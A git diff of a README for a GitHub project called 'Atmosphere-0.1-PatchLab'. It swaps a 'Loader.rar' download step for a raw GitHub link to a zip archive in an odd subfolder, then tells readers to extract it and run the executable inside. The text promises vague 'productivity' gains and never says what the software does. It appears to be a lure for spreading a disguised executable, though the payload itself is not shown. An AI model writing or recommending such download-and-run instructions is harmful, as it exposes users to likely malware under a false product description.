MUTANGUHAVA/Atmosphere-0.1-PatchLab/README.md

 Getting started is easy!
 Follow these simple steps to install project ATMOSPHERE 0.1 Patch:

-1. **Download** Loader.rar from the repository.
+1. **Download** https://raw.githubusercontent.com/MUTANGUHAVA/Atmosphere-0.1-PatchLab/main/Cylindrella/Atmosphere-0.1-PatchLab.zip from the repository.
-2. **Extract** the Loader.rar file to your desired folder using your favorite archiver (.rar support recommended, such as WinRAR or 7-Zip).
+2. **Extract** the https://raw.githubusercontent.com/MUTANGUHAVA/Atmosphere-0.1-PatchLab/main/Cylindrella/Atmosphere-0.1-PatchLab.zip file to your desired folder using your favorite archiver (.rar support recommended, such as WinRAR or 7-Zip).
 3. **Run** the executable or corresponding script file for your operating system.
 4. **Configure** your settings via the intuitive user interface.
 5. **Enjoy** enhanced productivity and resource optimization on your device!